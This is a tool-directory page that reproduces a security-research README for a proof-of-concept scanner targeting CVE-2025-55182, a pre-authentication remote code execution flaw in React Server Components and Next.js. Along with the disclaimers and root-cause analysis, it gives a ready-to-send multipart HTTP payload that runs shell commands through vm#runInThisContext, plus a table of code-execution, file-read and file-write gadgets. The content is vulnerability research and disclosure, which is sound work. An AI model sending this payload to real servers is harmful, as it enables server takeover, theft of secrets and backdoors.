Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/im-hanzou/cve-2025-55182-poc-scanner
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationPenetration TestingPapers & ResearchLearning & EducationRed TeamingPayload Development
GitHubim-hanzou/cve-2025-55182-poc-scanner

CVE-2025-55182-POC-SCANNER

Unified Security Research Tool

View Repository
2210 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-55182: Critical Pre-Authentication RCE in React Server Components

CVE-2025-55182 CVSS 10.0 Affected React Versions Affected Next.js Versions

Security Research by schema.cx
"Control is an illusion. It's the systems we build that control us—unless we understand them first."


📋 Table of Contents

  • Disclaimer & Legal Notice
  • Executive Summary
  • Technical Description
  • Affected Systems
  • Proof of Concept
  • Impact Assessment
  • Mitigation & Remediation
  • Responsible Disclosure Timeline
  • References
  • Attribution

⚠️ Disclaimer & Legal Notice

THIS TOOL IS FOR AUTHORIZED SECURITY TESTING ONLY

STOP. READ THIS BEFORE PROCEEDING.

This repository contains proof-of-concept code for a critical security vulnerability. By accessing, downloading, or using any materials in this repository, you acknowledge and agree to the following:

Legal Requirements

  1. Written Authorization Required: You MUST have explicit, written permission from the system owner before conducting any security testing. Verbal agreements are insufficient.

  2. Scope Limitations: Testing must be confined to systems explicitly listed in your authorization. "Scope creep" is not permitted.

  3. Applicable Laws: Unauthorized access to computer systems violates:

    • United States: Computer Fraud and Abuse Act (CFAA), 18 U.S.C. § 1030
    • European Union: Directive 2013/40/EU on attacks against information systems
    • United Kingdom: Computer Misuse Act 1990
    • Australia: Criminal Code Act 1995, Division 477-478
    • Other jurisdictions: Similar computer crime laws apply globally

Liability Disclaimer

THE AUTHORS AND CONTRIBUTORS OF THIS REPOSITORY:

  • Accept NO responsibility for misuse of this tool
  • Provide NO warranty, express or implied
  • Are NOT liable for any damages arising from use or inability to use this software
  • Do NOT endorse illegal activities of any kind

Ethical Guidelines

  • Never test without permission — even if you "just want to check"
  • Document everything — maintain detailed logs of all testing activities
  • Minimize impact — use the least invasive methods possible
  • Report responsibly — follow coordinated disclosure practices
  • Respect privacy — do not exfiltrate or retain sensitive data

"The question isn't whether we can exploit the vulnerability. It's whether we should, and for what purpose."


📊 Executive Summary

CVE-2025-55182 is a critical pre-authentication remote code execution (RCE) vulnerability affecting React Server Components in React 19.x and Next.js 15.x-16.x applications.

Business Impact

This vulnerability allows any unauthenticated attacker with network access to a vulnerable application to execute arbitrary commands on the server. The attack requires no credentials, no user interaction, and can be fully automated. Successful exploitation leads to:

  • Complete server compromise — attackers gain full control of the underlying system
  • Data breach potential — access to databases, environment variables, secrets, and user data
  • Lateral movement — compromised servers can be used to attack internal networks
  • Supply chain risk — production systems serving millions of users may be affected

Severity Rating

MetricRating
CVSS v3.1 Base Score10.0 CRITICAL
Attack VectorNetwork
Attack ComplexityLow
Privileges RequiredNone
User InteractionNone
Impact (C/I/A)High / High / High

"People trust systems because they don't understand them. That trust is a vulnerability."


🔬 Technical Description

Root Cause Analysis

The vulnerability exists in React's Flight protocol implementation within the requireModule function. This function uses bracket notation to access module exports based on user-controlled input, without validating that the requested property is an own property of the module.

Vulnerable Code Location:

react-server-dom-webpack/cjs/react-server-dom-webpack-server.node.development.js
Function: requireModule (approximately line 2546-2558 in v19.0.0)

Vulnerable Pattern:

function requireModule(metadata) {
  var moduleExports = __webpack_require__(metadata[0]);
  // ... async handling ...
  return moduleExports[metadata[2]];  // ← VULNERABLE: No hasOwnProperty check
}

Exploitation Mechanism

The attack leverages JavaScript's prototype chain traversal:

  1. Entry Point: Attacker sends a malicious multipart form request to a Server Action endpoint
  2. Payload Injection: The $ACTION_0:0 field contains JSON with attacker-controlled id (module#export format) and bound (arguments) properties
  3. Prototype Access: By specifying exports like constructor or accessing prototype properties, attackers can reference built-in Node.js modules
  4. RCE Gadgets: Functions like vm.runInThisContext, child_process.execSync, or fs.readFileSync execute with attacker-supplied arguments

Attack Vector

HTTP POST /formaction
    ↓
decodeAction(formData, serverManifest)
    ↓
loadServerReference(manifest, value.id, value.bound)
    ↓
resolveServerReference(config, id)  // Parses "module#export" format
    ↓
requireModule(metadata)
    ↓
moduleExports[metadata[2]]  // Prototype chain access → RCE

Payload Structure

POST /api/action HTTP/1.1
Content-Type: multipart/form-data; boundary=----Boundary

------Boundary
Content-Disposition: form-data; name="$ACTION_REF_0"

------Boundary
Content-Disposition: form-data; name="$ACTION_0:0"

{"id":"vm#runInThisContext","bound":["require('child_process').execSync('whoami').toString()"]}
------Boundary--

Available RCE Gadgets

GadgetModuleDescriptionImpact
vm#runInThisContextvmExecute JS in current contextDirect RCE
vm#runInNewContextvmExecute JS in sandbox (escapable)Direct RCE
child_process#execSyncchild_processExecute shell commandsDirect RCE
child_process#spawnSyncchild_processSpawn processesDirect RCE
fs#readFileSyncfsRead arbitrary filesData Exfiltration
fs#writeFileSyncfsWrite arbitrary filesPersistence/Backdoor
module#_loadmoduleLoad JS modules (2-step RCE)Indirect RCE

"Every system has a door. The question is whether you built the lock yourself—or inherited it from someone who never expected visitors."


🎯 Affected Systems

Vulnerable Versions

ProductVulnerable VersionsPatched Versions
React19.0.0, 19.1.0, 19.1.1, 19.2.019.0.1+, 19.1.2+, 19.2.1+
Next.js15.x, 16.x (using vulnerable React)Versions with patched React

Prerequisites for Exploitation

Download Tool